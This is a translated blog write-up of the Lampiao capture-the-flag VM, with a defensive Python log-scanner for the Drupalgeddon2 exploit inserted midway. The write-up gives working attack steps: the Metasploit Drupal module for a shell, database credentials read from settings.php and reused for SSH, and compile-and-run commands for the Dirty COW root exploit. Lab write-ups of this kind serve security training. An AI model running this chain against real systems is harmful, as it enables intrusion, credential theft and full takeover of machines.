Lampiao practical penetration test

In the Lampiao penetration test, the Drupal 7 getshell vulnerability is worth further study; when you get the chance, reproduce it and look at the principle. The target machine was also used to practice Dirty COW privilege escalation...

Target IP: 192.168.8.136

Full nmap port scan

nmap -sS -Pn -A -p- -n 192.168.8.136 

Ports 80 and 1898 are both web services; there is nothing on port 80, so go straight to 1898...

Drupal 7 vulnerability getshell

http://192.168.8.136:1898/robots.txt lists many sensitive directories:

http://192.168.8.136:1898/?q=admin/
http://192.168.8.136:1898/?q=user ..... 

Too much information is overwhelming. Wappalyzer shows the site is running the Drupal 7 CMS.


This CMS has quite a few known vulnerabilities, and they have CVE numbers, so searching directly on Kali is enough: CVE-2018-7600.

I ran into some problems, so I updated to msf5 (see https://www.jianshu.com/p/0f12828d20c2) and then searched for drupal.

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.8.136
set RPORT 1898
exploit

Got a shell directly:


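For the defender's side of the Drupalgeddon2 step above, here is an added example (not code from the original post) that scans Apache combined-format access-log lines for the signal that the Drupal 7.58 fix for CVE-2018-7600 removes: request parameters whose names or value segments start with '#'. The log lines are constructed for illustration; POST bodies are not in access logs, so this only catches keys carried in the query string.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache "combined" access-log line; the request path carries the query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

def hash_keys(query):
    """Return every decoded parameter name or value segment that starts with '#'.
    Drupal 7.58 fixed SA-CORE-2018-002 (CVE-2018-7600) by stripping such keys from
    request input, so their presence in a request is the signal worth alerting on."""
    hits = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded once; unquote again to catch double-encoding.
        key, value = unquote(key), unquote(value)
        # A Form API key like '#value' may be a bare key, a bracketed array key
        # such as 'mail[#x][]', or a '/'-separated segment of a parameter value.
        for seg in re.split(r'[\[\]/]+', key) + value.split('/'):
            if seg.startswith('#'):
                hits.append(seg)
    return hits

def suspicious_drupal_requests(log_lines):
    """Return (client_ip, request_path, flagged_keys) for each line carrying '#'-keys."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m.group('path')
        keys = hash_keys(path.partition('?')[2])
        if keys:
            findings.append((m.group('ip'), path, keys))
    return findings

# Constructed sample lines (hypothetical traffic, not from the original post).
SAMPLE_LOG = [
    '192.168.8.50 - - [10/Jul/2019:10:00:01 +0000] "GET /?q=user/login HTTP/1.1" 200 5123',
    '192.168.8.50 - - [10/Jul/2019:10:00:07 +0000] "POST /?q=user/register'
    '&element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 311',
    '192.168.8.51 - - [10/Jul/2019:10:01:12 +0000] "GET /?q=node/3&field%5B%23markup%5D=x HTTP/1.1" 403 88',
]

if __name__ == '__main__':
    for ip, path, keys in suspicious_drupal_requests(SAMPLE_LOG):
        print(ip, keys, path)
```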

SSH login as tiago

Spawn /bin/bash with python:

python -c 'import pty;pty.spawn("/bin/bash")'

Browsing the web root directory, I found a lot of strange files


An audio file: http://192.168.8.136:1898/audio.m4a


Listening to it: "user tiago". So the user is tiago???

There is also a song, http://192.168.8.136:1898/LuizGonzaga-LampiaoFalou.mp3: ??!!?? What is this???

Site configuration files usually contain the database configuration, so try to find Drupal's.

The default configuration file settings.php is in the sites/default directory:



You can see the database user and password:


'username' => 'drupaluser'
'password' => 'Virgulino'

Log in to the database right away:

mysql -u drupaluser -p

The drupal database has a users table; the first user is tiago, but the password MD5 could not be cracked...



The webmaster can usually SSH into the server.

Try SSH as tiago, first with the password Virgulino; if that fails, brute-force with hydra.

ssh tiago@192.168.8.136 

The login succeeds; next, privilege escalation.

Dirty COW privilege escalation

Check the target's kernel:

lsb_release -a
uname -a

A 2016 kernel, so try Dirty COW first, needless to say.



Privilege escalation script 40847.cpp

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~

Write it to a writable directory on the target, then compile and run


vim dirtycow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirtycow dirtycow.cpp -lutil
Parameter explanation:
1. -Wall: generally used; enables all the useful warnings GCC can provide
2. -pedantic: enables all warnings listed by the ANSI/ISO C standard
3. -O2: the compiler's optimization option has 4 levels; -O0 means no optimization, -O1 is the default, -O3 is the highest optimization level
4. -std=c++11: compile according to the C++ 2011 standard
5. -pthread: when using multithreading on Linux, the pthread library must be linked
6. -o dcow: the target file generated by gcc, named dcow

Run the privilege escalation:

./dirtycow -s

Get flag

flag:

9740616875908d91ddcdaa8aea3af366

Summary

1. The target's web system is built on the Drupal 7 CMS; always pay attention to known CMS vulnerabilities
2. When out of ideas, just try things! You often get unexpected results
3. Then practice Dirty COW privilege escalation...

Lampiao target machine Baidu Cloud download
link: https://pan.baidu.com/s/1_TDcubSNj7z5JweaTxjgKQ
extraction code: g3fn



Author: City man strong
Link: https://www.jianshu.com/p/ce319b350885
Source: Jianshu
Copyright belongs to the author. For reproduction in any form, please contact the author for authorization and indicate the source.


Origin: www.cnblogs.com/gao88/p/11166040.html